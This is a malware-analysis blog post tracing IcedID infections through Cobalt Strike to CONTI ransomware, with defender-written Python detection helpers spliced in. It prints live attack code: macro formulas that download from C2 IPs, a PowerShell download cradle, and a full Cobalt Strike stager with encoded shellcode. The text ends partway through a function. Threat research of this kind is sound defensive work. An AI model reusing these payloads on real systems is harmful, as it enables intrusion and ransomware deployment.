Shelob Moonlight – Spinning a Larger Web

By Max Malyutin – Sr. Threat Researcher

Introduction

Cynet’s research and CyOps groups are constantly working to better understand and discover additional angles threat actors might utilize when trying to compromise our customers. This, in turn, translates into ongoing analysis of banking trojan variants such as the infamous Emotet, Ursnif (a.k.a. Gozi), Trickbot and Dridex, and of the tactics, techniques, and procedures (TTPs) of the threat actors behind them.

The data and findings below were derived directly from Cynet client environments and research labs. If you suspect that your devices may be infected with any of the malware described below, please reach out directly to Cynet for help with evaluation and incident response. Cynet’s MDR team, CyOps, is available 24×7 and ready to help you begin threat hunting.

IcedID overview

IcedID (a.k.a. BokBot; MITRE ATT&CK ID S0483) was first seen in September 2017 and classified as a banking trojan designed to target the financial sector in the U.S. and Europe, allowing threat actors to steal financial information, banking credentials, and payment information using web injection and browser hooking techniques.

From 2017 to 2021, the IcedID threat groups used multiple attack techniques and upgraded the range of malicious capabilities to evade detection and deploy massive attack campaigns. The IcedID threat groups remodeled their MO (modus operandi) into a downloader, expanding the malware’s capabilities beyond a banking trojan to enable the distribution of sophisticated threats such as Cobalt Strike Beacons and ransomware families such as MAZE, EGREGOR, Sodinokibi, and CONTI.

With this change, IcedID became part of the organized-cybercrime Malware-as-a-Service (MaaS) ecosystem.

Threat groups associated with IcedID

GOLD CABIN aka: Shakthak, TA551

LUNAR SPIDER aka: GOLD SWATHMORE

The TA551 and LUNAR SPIDER threat groups are classified as eCrime groups whose primary motivation is targeting financial organizations. These eCrime groups are associated with various malware families, including IcedID, Qakbot, Ursnif, and Valak. The distinctive pattern of these groups lies in their kill chain: weaponized Office documents (Excel and Word), usually contained in a password-protected zip file, are distributed via malspam email campaigns and then download or drop malware (in most cases in the form of DLL payloads).

We suspect that LUNAR SPIDER and WIZARD SPIDER are related, as we observed these groups coordinating the distribution of each other’s malware. For example, we observed a LUNAR SPIDER (IcedID) malspam campaign that drops the WIZARD SPIDER malware Trickbot.
Our recent observations suggest that IcedID infections include CONTI ransomware, which is related to the WIZARD SPIDER threat group.

IcedID (BokBot) overview

  • Spear phishing attachment distribution via malspam campaigns (zipped, weaponized Microsoft office documents)
  • User execution via enabling macros
  • DLL download from C2 server
  • Loader DLL execution via rundll32\regsvr32; LOLbins (Living Off the Land Binaries)
  • Fingerprinting and enumeration of the compromised machine
  • C2 server connection and transmission of the initial host information
  • Initial access for sophisticated threats (downloader activity)

IcedID seems to be one of the most prevalent malware families today, taking the place of the infamous Emotet, “the world’s most dangerous malware.” Emotet was taken down at the end of January 2021 by a major law enforcement operation coordinated between multiple authorities, including Europol, the FBI, and the UK’s National Crime Agency, along with agencies from Canada, France, Germany, Lithuania, the Netherlands, and Ukraine.

Once upon a time in Troy – Emotet malware, a trojan evolution:

In recent months, Cynet 360 observed a high number of IcedID infections utilizing Cobalt Strike Beacons and finally attempting to impact the domain with CONTI ransomware.

CONTI Overview

CONTI (MITRE ID: S0575) is a new ransomware observed in the wild and has become a new target for the FBI. On May 20, 2021 the FBI released an article discussing the impact of Conti ransomware on healthcare, law enforcement agencies, and emergency medical services in the US.
The CONTI group operates as Ransomware-as-a-Service (RaaS) affiliated with the “Wizard Spider” threat group. CONTI ransomware was first seen at the end of 2020. We have recently observed CONTI targeting the US and Europe. The NCSC (National Cyber Security Centre) has participated in recent CONTI infection investigations.

Recent news about CONTI:

Cynet to the rescue

Cynet360 autonomous breach protection platform detects and prevents the IcedID kill chain.

Cynet CyOps and Research teams have recently responded to several incidents at organizations where the Cynet 360 platform was not deployed, in which an IcedID infection eventually impacted the compromised domain with CONTI ransomware.

The initial access vector in these cases was a malspam campaign delivering malicious email containing a zipped file, followed by a weaponized office document downloading the IcedID malware. The IcedID malware, in turn, launched a Cobalt Strike beacon on the compromised machine that executed discovery actions on the domain while abusing Windows legitimate binaries.

The next steps of the infection included privilege escalation and lateral movement activities. Once the attackers established persistence on the domain, a CONTI ransomware variant was dropped.

MITRE ATT&CK TTPs Mapping

TA0001 – Initial Access
  • T1566.001: Spearphishing Attachment

TA0002 – Execution
  • T1204: User Execution
  • T1059.001: PowerShell
  • T1059.003: Windows Command Shell
  • T1559.002: Dynamic Data Exchange
  • T1106: Native API
  • T1129: Shared Modules
  • T1569.002: Service Execution

TA0004 – Privilege Escalation
  • T1055: Process Injection
  • T1134: Access Token Manipulation

TA0005 – Defense Evasion
  • T1140: Deobfuscate/Decode Files or Information
  • T1562.001: Disable or Modify Tools
  • T1036: Masquerading
  • T1112: Modify Registry
  • T1027: Obfuscated Files or Information
  • T1055: Process Injection
  • T1218.011: Rundll32
  • T1218.005: Mshta
  • T1218.010: Regsvr32
  • T1218.007: Msiexec
  • T1218: Signed Binary Proxy Execution
  • T1497.001: System Checks

TA0007 – Discovery
  • T1087: Account Discovery
  • T1482: Domain Trust Discovery
  • T1135: Network Share Discovery
  • T1057: Process Discovery
  • T1012: Query Registry
  • T1018: Remote System Discovery
  • T1518.001: Security Software Discovery
  • T1082: System Information Discovery
  • T1016: System Network Configuration Discovery
  • T1033: System Owner/User Discovery

TA0008 – Lateral Movement
  • T1570: Lateral Tool Transfer
  • T1021.002: SMB/Windows Admin Shares

TA0011 – Command and Control
  • T1071.001: Web Protocols
  • T1132.001: Standard Encoding
  • T1105: Ingress Tool Transfer
  • T1571: Non-Standard Port

TA0010 – Exfiltration
  • T1041: Exfiltration Over C2 Channel

TA0040 – Impact
  • T1486: Data Encrypted for Impact
  • T1490: Inhibit System Recovery

Technical analysis

Entry point

The IcedID infection chain begins with an email vector: spear phishing emails.

The email is delivered through phishing campaigns and contains either a malicious (weaponized) Microsoft Office document or a password-protected zip file containing the weaponized Microsoft Office document, either an MS Word file or an Excel spreadsheet, leading to the execution of multi-stage malicious actions.

Example weaponized Microsoft Office document requesting the user to activate macros:

MD5: e51d7a4db66d3ea986343fe3e221b7fc

SHA-256: f578d6e7fc4d204ef17549be7ea8f3b6bca4b4103e7afff483b180f95f818a20

File type: Office Open XML Document

Magic: Zip archive data, at least v2.0 to extract

Weaponized Word document:

Grandparent Process:
c:\program files (x86)\microsoft office\root\office16\outlook.exe
Parent Process Details:
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\*\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\82QPK64D\request (002).zip"
Process Details:
"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\*\AppData\Local\Temp\7zO77B8.tmp\fatti-03.21.doc" /o ""

Example weaponized Excel spreadsheet requesting the user to activate macros:

MD5: d15d140f0d5d88542d059ecd483dee38

SHA-256: db66539408a53e25bf005990c1b868ef140303d2ccfa6964b63b26b6bfc1b07b

File type: Office Open XML Spreadsheet

Magic: Zip archive data, at least v2.0 to extract

Execution

The process tree execution flow:

Network traffic to the C2 servers:

190[.]14[.]38[.]106

193[.]38[.]54[.]246

51[.]89[.]73[.]152

Weaponized Excel document:

Process Details:
"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\*\AppData\Local\Temp\Temp1_Complaint_726368224_04122021.zip\Complaint_726368224_04122021.xlsm"

The weaponized Office documents contain highly obfuscated VBA code and an AutoOpen\AutoClose macro for execution. The IcedID Excel spreadsheet documents use Excel 4.0 macro (XLM) formulas.

The IcedID threat actors utilize evasion and anti-analysis techniques to hide the malicious content of the Excel 4.0 macro formulas and to make analysis of the malicious document more complex.

The font color of the macro sheet cells was set to white, allowing IcedID to hide the macro formulas from view.

Findings from the malicious sheets:

Both weaponized Microsoft Office documents, Excel and MS Word, lure the user into opening the document and enabling the macro by clicking “ENABLE EDITING” and then “ENABLE CONTENT”.

Clicking ENABLE CONTENT automatically executes the malicious obfuscated macros.

After initial access, and once macros are enabled, the embedded URLs are used to download masqueraded DLL files (the Excel spreadsheet uses URLDownloadToFile for the download).

Weaponized Microsoft Office document:
MD5: eb1d27c0d19fcaa8b64423e7502baef3

SHA-1: 99afdc744ef8f0a7b2e69aca01a10ca8f1eec26b

SHA-256: baa952bfeae28062d42e78bed942525b68090b4b43ac2ec8a619d0580bd1acca

File type: Office Open XML Spreadsheet

Magic: Zip archive data, at least v2.0 to extract

Excel 4.0 macro (XLM) formulas:
=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "http://188[.]127[.]235[.]69/44300,5396033565[.]dat", "..\Klos.viters")

=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "http://45[.]144[.]30[.]41/44300,5396033565[.]dat", "..\Klos.viters1")

=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "http://62[.]109[.]24[.]36/44300,5396033565[.]dat", "..\Klos.viters2")
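As an added example (not code from the Cynet report), a small Python scanner for Excel 4.0 macro formulas extracted from a sheet: it parses =CALL(...) formulas, normalizes the module name so that “uRlMon”, “URLMON.DLL” and “urlmon” all match, flags calls to URLDownloadToFile (the A variant shown above and, going slightly beyond the page, the W variant), and reports the URL and destination path, noting the “..\” relative destination used in these samples. The formulas are constructed samples with documentation-range addresses, not the real C2 URLs.

```python
import re
from typing import Dict, List, Optional

# Accepts =CALL(...) with any spacing or casing; the argument list is captured raw.
CALL_RE = re.compile(r"^\s*=\s*CALL\s*\((?P<args>.*)\)\s*$", re.IGNORECASE | re.DOTALL)
QUOTED_RE = re.compile(r'"([^"]*)"')


def parse_call(formula: str) -> Optional[Dict[str, object]]:
    """Return module, function and the remaining string arguments of a CALL formula."""
    m = CALL_RE.match(formula)
    if m is None:
        return None
    strings = QUOTED_RE.findall(m.group("args"))
    if len(strings) < 2:
        return None
    return {"module": strings[0], "function": strings[1], "strings": strings[2:]}


def _normalize_module(name: str) -> str:
    # "uRlMon", "URLMON.DLL" and "urlmon" all load the same library
    name = name.lower()
    return name[:-4] if name.endswith(".dll") else name


def find_download_calls(formulas: List[str]) -> List[Dict[str, object]]:
    """Flag CALL formulas that invoke urlmon!URLDownloadToFile(A/W)."""
    hits = []
    for formula in formulas:
        call = parse_call(formula)
        if call is None:
            continue
        if _normalize_module(call["module"]) != "urlmon":
            continue
        if not call["function"].lower().startswith("urldownloadtofile"):
            continue
        strings = call["strings"]
        url = next((s for s in strings if s.lower().startswith(("http://", "https://"))), None)
        dest = strings[-1] if strings else None
        hits.append({
            "formula": formula,
            "url": url,
            "dest": dest,
            # the samples on the page write next to the document via "..\" rather than to %TEMP%
            "relative_path": dest is not None and dest.startswith(".."),
        })
    return hits


# Constructed sample formulas in the shape of the ones above (addresses are
# RFC 5737 documentation ranges, not the real C2 servers).
SAMPLE_FORMULAS = [
    '=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "http://192.0.2.10/44300,5396033565.dat", "..\\Klos.viters")',
    '=CALL("uRlMon", "URLDownloadToFileA", "JCCB", 0, "http://198.51.100.7/44300,5396033565.dat", "..\\Klos.viters1")',
    '=CALL("URLMON.DLL", "URLDownloadToFileW", "JCCB", 0, "http://203.0.113.5/44300,5396033565.dat", "..\\Klos.viters2")',
    "=SUM(A1:A3)",
    "=HALT()",
]

if __name__ == "__main__":
    for hit in find_download_calls(SAMPLE_FORMULAS):
        print(hit["url"], "->", hit["dest"], "(relative)" if hit["relative_path"] else "")
```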

Defense evasion

These DLL files are executed by rundll32.exe (execution via regsvr32.exe was also spotted) with the command line “rundll32 ..\[DLL name].[random extension],DllRegisterServer”: a relative path, a non-DLL extension, and the DllRegisterServer export called by name.

regsvr32 execution example:
"C:\Windows\System32\regsvr32.exe" c:\users\public\globalStorage.jpg

Cynet visibility over IcedID campaigns:

rundll32 command executions detected by Cynet 360:
May 26 2021 rundll32 ..\Hikos.hertolo1,DllRegisterServer

May 26 2021 rundll32 ..\Hikos.hertolo,DllRegisterServer

May 25 2021 rundll32 ..\iroto.tio1,DllRegisterServer

May 25 2021 rundll32 ..\iroto.tio,DllRegisterServer

May 24 2021 rundll32 ..\Hikos.hertolo2,DllRegisterServer

May 24 2021 rundll32 ..\svvhos.dati4,DllRegisterServer

May 20 2021 rundll32 ..\durio.fur,DllRegisterServer

May 17 2021 rundll32 ..\bubl.cmi1,DllRegisterServer

May 17 2021 rundll32 ..\bubl.cmi,DllRegisterServer

May 13 2021 rundll32 ..\lertio.cersw,DllRegisterServer

May 13 2021 rundll32 ..\tuti.rut,DllRegisterServer

May 13 2021 rundll32 ..\tuti.rut1,DllRegisterServe

May 13 2021 rundll32 ..\dtfhdtr.ert,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer5,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer4,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer2,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer3,DllRegisterServer

May 13 2021 rundll32 ..\wiroe.oer1,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb4,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb1,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb3,DllRegisterServer

May 13 2021 rundll32 ..\nvcoerf.vlb2,DllRegisterServer

May 11 2021 rundll32 ..\ikjcvesdv.ref,DllRegisterServer

May 5 2021 rundll32 ..\svvhos.dati3,DllRegisterServer

May 5 2021 rundll32 ..\svvhos.dati2,DllRegisterServer

May 5 2021 rundll32 ..\svvhos.dati1,DllRegisterServer

May 5 2021 rundll32 ..\svvhos.dati,DllRegisterServer

May 20 2021 rundll32 ..\Hikos.hertolo,DllRegisterServer

Apr 28 2021 rundll32 ..\Butyo.vikas,DllRegisterServer

Apr 26 2021 rundll32 ..\jjoputi.vvt1,DllRegisterServer

Apr 26 2021 rundll32 ..\jjoputi.vvt2,DllRegisterServer

Apr 23 2021 rundll32 ..\duron.bnm1,DllRegisterServer

Apr 21 2021 rundll32 ..\ghnrope.ito1,DllRegisterServer

Apr 20 2021 rundll32 ..\Klos.viters1,DllRegisterServer

Apr 20 2021 rundll32 ..\Klos.viters,DllRegisterServer

Apr 20 2021 rundll32 ..\Klos.viters2,DllRegisterServer

Apr 13 2021 rundll32 ..\Hodas.vyur2,DllRegisterServer

Apr 13 2021 rundll32 ..\Hodas.vyur1,DllRegisterServer

Apr 13 2021 rundll32 ..\Hodas.vyur,DllRegisterServer

Apr 6 2021 Rundll32 ..\Kiod.hod1,DllRegisterServer

Apr 6 2021 Rundll32 ..\Kiod.hod2,DllRegisterServer

Apr 6 2021 Rundll32 ..\Kiod.hod,DllRegisterServer

IcedID sample analysis

MD5: 4474dd4c14f76b6b40f855b9aae628fa

SHA-256: 93e5fc51525d584a80db2505638f0f9237bff8d01adc330049a414b45c7a811c

Imphash: 78ed290a779aa51d4473678936319a48

SSDEEP: 768:GGS/PPJ69K2c5r8OsDBZpAYqRHAZorOs1gxuqkB1chYsNbp6SGu4nQvxVH2oOB4:yPRESOn+YC1ZB1chYsNl6SWn+Lc4

File type: Win32 DLL

Magic: PE32+ executable for MS Windows (DLL) (GUI) Mono/.Net assembly

Entropy: 7.302

Exports:

DllRegisterServer

PluginInit

By setting breakpoints on the VirtualAlloc API, we unpacked the IcedID payload: a memory region is allocated (initially zero-filled) and the unpacked payload is written into it.

The below section is responsible for the unpacking routine:

The memory page holding the unpacked IcedID has ERW (Execute, Read, Write) protection.

The dumped IcedID file contains various HTTP APIs. Using IDA we can observe the use of the HTTP APIs in the code.

The IcedID loader gathers information by performing initial enumeration and fingerprinting of the compromised host and sends it to the command-and-control server. The information includes the OS version and the physical (MAC) address, sent in an encoded cookie.

Example of cookie names and order:
Cookie:

__gads

_gat= OS version

_ga= CPU

_u= Computer name and the username

__io= User SID

_gid= MAC

Hunting tip: an outbound connection carrying the above cookie set could be an indicator of IcedID activity.
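An added example (not from the report): Python that checks a captured HTTP request for the IcedID fingerprint cookie set listed above, matching both the cookie names and their order, so that ordinary Google Analytics cookies (_ga, _gid, _gat) do not trip it on their own. The requests are constructed samples with placeholder values.

```python
from typing import List, Optional, Tuple

# Cookie names, in the order listed above, that the IcedID loader uses to carry
# host fingerprint data (OS version, CPU, computer/user name, SID, MAC) to its C2.
ICEDID_COOKIE_ORDER = ["__gads", "_gat", "_ga", "_u", "__io", "_gid"]


def parse_cookie_header(value: str) -> List[Tuple[str, str]]:
    """Split a Cookie header value into (name, value) pairs, preserving order."""
    pairs = []
    for part in value.split(";"):
        part = part.strip()
        if part:
            name, _, val = part.partition("=")
            pairs.append((name.strip(), val.strip()))
    return pairs


def extract_cookie_header(raw_request: str) -> Optional[str]:
    """Return the Cookie header value of a raw HTTP request, or None if absent."""
    for line in raw_request.splitlines():
        if line.lower().startswith("cookie:"):
            return line.split(":", 1)[1].strip()
    return None


def icedid_cookie_names(raw_request: str) -> List[str]:
    """Names from the IcedID set that appear in the request, in request order.

    A partial overlap (e.g. only _ga/_gid/_gat, which real Google Analytics
    sets too) is weak evidence on its own; the full ordered set is the signal.
    """
    header = extract_cookie_header(raw_request)
    if header is None:
        return []
    return [name for name, _ in parse_cookie_header(header) if name in ICEDID_COOKIE_ORDER]


def is_icedid_beacon(raw_request: str) -> bool:
    """True when all six cookie names are present in exactly the documented order."""
    return icedid_cookie_names(raw_request) == ICEDID_COOKIE_ORDER


# Constructed sample: an IcedID-style check-in (cookie values are placeholders).
SAMPLE_BEACON = (
    "GET / HTTP/1.1\r\n"
    "Host: c2.example.invalid\r\n"
    "Cookie: __gads=2001; _gat=10.0.19041.64; _ga=1.2.1234567890.1234567890; "
    "_u=4142434445464748; __io=21_1234567_0; _gid=001122334455\r\n"
    "\r\n"
)

# Constructed sample: ordinary Google Analytics cookies on a normal page load.
SAMPLE_BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Cookie: _ga=GA1.2.123.456; _gid=GA1.2.789.012; _gat=1\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(label, icedid_cookie_names(req), is_icedid_beacon(req))
```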

The CPU ID check, stored in _ga:

The OS version check, stored in _gat:

The user SID check, stored in __io:

The username and computer name check, stored in _u:

The adapter info (MAC) check, stored in _gid:

IcedID communicating with the C2 server and sending the enumerated data, as found in memory:

dsedertyhuiokle[.]top -> 192[.]42[.]116[.]41

IcedID communicating files – SHA-256:

Payload execution to Cobalt Strike

After execution of the first-stage loader, the C2 server responds with a fake GZIP file, which is the encrypted IcedID payload; it is downloaded from the C2 server and executed via rundll32.exe.

The license.dat file is the core module of IcedID.

rundll32.exe "C:\Users\*\AppData\Local\Qiik\cuucuy\Agmupn.dll",update /i:"BarelyHedgehog\license.dat"

After the execution of the license.dat, the post-infection uses dynamic injection behavior related to a Cobalt Strike beacon allowing threat actor groups to gain full remote control over the compromised machine.

Parent Process Details:
rundll32.exe "C:\Users\*\AppData\Local\Qiik\cuucuy\Agmupn.dll",update /i:"BarelyHedgehog\license.dat"
Process Details:
C:\Windows\SysWOW64\cmd.exe
Target (injected) Process:
c:\windows\system32\rundll32.exe
The injected data:
MZARUH\x89\xe5H\x81\xec \x00\x00\x00H\x8d\x1d\xea\xff\xff\xffH\x81\xc3\xcc\t\x00\x00\xff\xd3H\x89\xc3I\x89\xf8h\x04\x00\x00\x00Z\xff\xd0A\xb8\xf0\xb5\xa2Vh\x05\x00\x00\x00Z\xff\xd3\x00\xe8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\t\xcd!\xb8\x01L\xcd!This program…
Injection page info:
State=4096, Type=131072, AllocationProtect=64, RegionSize=135168

Payloads dropped by the rundll32 license.dat execution:

c:\users\*\appdata\local\temp\xugi64.exe

File SHA256: 48385CB94B871E3BF46BD1ABFACF1CD69155A0161D2D200ECEBD333A7FF137E8

C:\users\*\appdata\local\temp\ovuleq.exe

File SHA256: 668FCD27F21503184B9E6E10EDB9C9E5C6BA1484EBC60A33A7E6104CA4857561

Additional observations of process injection into different processes related to IcedID infections:

c:\windows\system32\svchost.exe

c:\windows\system32\wuauclt.exe

c:\windows\system32\mstsc.exe

c:\windows\system32\dllhost.exe

The Cobalt Strike infection was also observed utilizing PowerShell execution to perform a fileless shellcode injection.

The initial PowerShell command:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://23[.]108[.]57[.]148:80/a443'))"

The next-stage PowerShell script is hosted on the Cobalt Strike C2 server and is Base64 encoded.

powershell -nop -w hidden -encodedcommand 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

The decoded base64 command:

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

The above script is base64 encoded and is also compressed with a GzipStream. By decoding the base64 format and decompressing the GzipStream with Gunzip, we observed the final stage of the PowerShell script.

Set-StrictMode -Version 2

$DoIt = @'
# Resolves an exported function address through .NET reflection instead of P/Invoke declarations
function func_get_proc_address {
    Param ($var_module, $var_procedure)
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

# Builds a delegate type at runtime so a raw function pointer can be called
function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}

# XOR-encrypted shellcode, key 35 (0x23)
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckuYIiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMUFdRQlMMSQ5HRlVOSk0NSVAjYw/ZJenhCgpDI35esYcBKAWcYJMSe+gtFePx5m0nWZMajTjb23LByk3Zf0nlRm6pqbkZyrHQrunJ83/NI2tMUFcZA0BMR0YNSVJWRlFaDUBMTi4pYExNTUZAV0pMTRkDQE9MUEYuKWJAQEZTVxkDCQwJLiliQEBGU1cOZk1ATEdKTUQZA0RZSlMPA0FRLil2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLdEpNR0xUUANtdwMWDRIYA3RsdBUXCgNiU1NPRnRGQWhKVwwWEBQNEBUDC2hrd25vDwNPSkhGA2RGQEhMCgNgS1FMTkYMFhANEw0RGxARDRQDcEJFQlFKDBYQFA0QFS4pI66UgbRb7ZNFbikzX0DzRUBaVneuvudTWoRQ5Vij4frDKh5k8Sdhn10cm4vEqJnjdS/2ZWMJ0Mz7jNje8UIZdNvWDepYmvNaJkwxif/LqljAF697+1NM9aWDNcm5+lXfG48VbiNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcERANEhMbDRYUDRIXGyN9DVul')

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

# VirtualAlloc(NULL, len, MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40))
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

# The shellcode is 32-bit: on a 64-bit host it is run in a 32-bit job
If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}

The function “func_get_proc_address” uses .NET reflection to reach the Win32 API from memory: it locates the Microsoft.Win32.UnsafeNativeMethods type in System.dll and calls its GetModuleHandle and GetProcAddress methods to resolve any exported function (here, kernel32!VirtualAlloc).

The [Byte[]]$var_code assignment contains a base64 string which decodes to the shellcode, XOR-encrypted with the single-byte key 35 (0x23); the loop that follows decrypts it.

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSByckuYIiMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMUFdRQlMMSQ5HRlVOSk0NSVAjYw/ZJenhCgpDI35esYcBKAWcYJMSe+gtFePx5m0nWZMajTjb23LByk3Zf0nlRm6pqbkZyrHQrunJ83/NI2tMUFcZA0BMR0YNSVJWRlFaDUBMTi4pYExNTUZAV0pMTRkDQE9MUEYuKWJAQEZTVxkDCQwJLiliQEBGU1cOZk1ATEdKTUQZA0RZSlMPA0FRLil2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLdEpNR0xUUANtdwMWDRIYA3RsdBUXCgNiU1NPRnRGQWhKVwwWEBQNEBUDC2hrd25vDwNPSkhGA2RGQEhMCgNgS1FMTkYMFhANEw0RGxARDRQDcEJFQlFKDBYQFA0QFS4pI66UgbRb7ZNFbikzX0DzRUBaVneuvudTWoRQ5Vij4frDKh5k8Sdhn10cm4vEqJnjdS/2ZWMJ0Mz7jNje8UIZdNvWDepYmvNaJkwxif/LqljAF697+1NM9aWDNcm5+lXfG48VbiNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcERANEhMbDRYUDRIXGyN9DVul')

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

The decrypted shellcode is copied into the buffer that VirtualAlloc allocated for it and is then executed from that buffer.

In this case, the injection is a self-injection: the PowerShell instance that executed the command is the process that holds and runs the shellcode.
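As an added example (not from the report or the Cobalt Strike project), a Python triage helper that unwinds the three layers described above: the UTF-16LE -encodedcommand, the gzip-wrapped $DoIt script, and the base64 shellcode XORed with 35. It runs on a constructed fixture whose “shellcode” is marker text; the 0xFC 0xE8 check looks for the cld; call prologue that Cobalt Strike and Metasploit x86 stagers start with.

```python
import base64
import gzip
import re
from typing import Dict

XOR_KEY = 35  # the single-byte key from the "-bxor 35" loop in the script above

# The base64 literal handed to [Convert]::FromBase64String('...') or ("...")
B64_ARG_RE = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE
)


def decode_encoded_command(encoded: str) -> str:
    """Stage 0: -encodedcommand carries base64 of UTF-16LE script text."""
    return base64.b64decode(encoded).decode("utf-16-le")


def unwrap_gzip_stage(outer_script: str) -> str:
    """Stage 1: the one-liner base64-decodes a blob, runs it through a
    GzipStream and IEXes the result; do the same to recover the $DoIt script."""
    m = B64_ARG_RE.search(outer_script)
    if m is None:
        raise ValueError("no FromBase64String() argument in the outer stage")
    return gzip.decompress(base64.b64decode(m.group(1))).decode("utf-8")


def extract_shellcode(doit_script: str, key: int = XOR_KEY) -> bytes:
    """Stage 2: base64-decode the [Byte[]]$var_code blob and undo the XOR loop."""
    m = B64_ARG_RE.search(doit_script)
    if m is None:
        raise ValueError("no shellcode blob in the $DoIt script")
    return bytes(b ^ key for b in base64.b64decode(m.group(1)))


def triage(encoded_command: str) -> Dict[str, object]:
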